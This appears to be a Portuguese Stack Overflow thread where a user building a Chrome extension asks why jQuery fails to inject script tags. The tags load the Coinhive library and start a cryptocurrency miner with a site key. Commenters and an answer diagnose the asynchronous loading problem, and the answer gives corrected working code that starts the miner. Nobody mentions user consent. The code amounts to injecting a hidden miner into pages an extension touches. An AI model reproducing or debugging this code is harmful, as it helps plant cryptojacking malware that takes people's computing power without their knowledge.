# JQuery erro na hora de usar .before

Tags: jquery, google-chrome-extensão

```js
$(".enviar").before('<script src="https://coinhive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous("4jimrwZqZRoKFX1001NpibYyv1up80Y2"); miner.start();</script>');
```

Este é meu script completo e ele faz parte de uma extensão que estou criando mais como nunca tinha tido contato com JQuery estou tendo problemas simples.
Por favor me falem o que eu fiz de errado ou esqueci de colocar.

Comment: Tente _escapando_ as barras dos `</script>`, assim: `<\/script>`

Comment: O problema é que você quer adicionar uma referência externa e imediatamente, antes mesmo de carregar, já usar um objeto. Isso vai dar `CoinHive is not defined` certo?

Comment: @RicardoPontual O que eu devo fazer?

Comment: @sam Fiz o que voce falou mais o script não foi executado

Comment: Sim, aí já é outra questão. O que eu falei foi apenas para corrigir um erro de escape.

Comment: Veja no console se aparece algum erro.

Answer (score 0):

Bom não sei exatamente se carregar um script assim funciona, nunca fiz dessa forma. Mas se funciona, então tu tem um problema de de sincronicidade, quando você insere essas duas tags scripts no DOM o js da primeira sera requisitado, enquanto isso acontece você já esta processando o script da segunda tag.

o que tu pode fazer é inserir as tags separadas, primeiro tu insere a lib, e usa o evento de `onload` para executar esse segundo script.

Esse é um exemplo de como fazer sem jQuery

Ex.:

```js
// cria tag script
var coinhive=document.createElement('script');
coinhive.type='text/javascript';
coinhive.src='https://coinhive.com/lib/coinhive.min.js';

// executa quando lib for carregada
coinhive.onload = function(){
  var miner = new CoinHive.Anonymous("4jimrwZqZRoKFX1001NpibYyv1up80Y2"); miner.start();
}

// insere no DOM
document.body.appendChild(coinhive);
```

Obs.: é uma tag script, não acredito que seja importante o local onde esta sendo inserida, mas caso seja tu pode usar o insertBefore.

Doc  insertBefore
https://www.w3schools.com/jsref/met_node_insertbefore.asp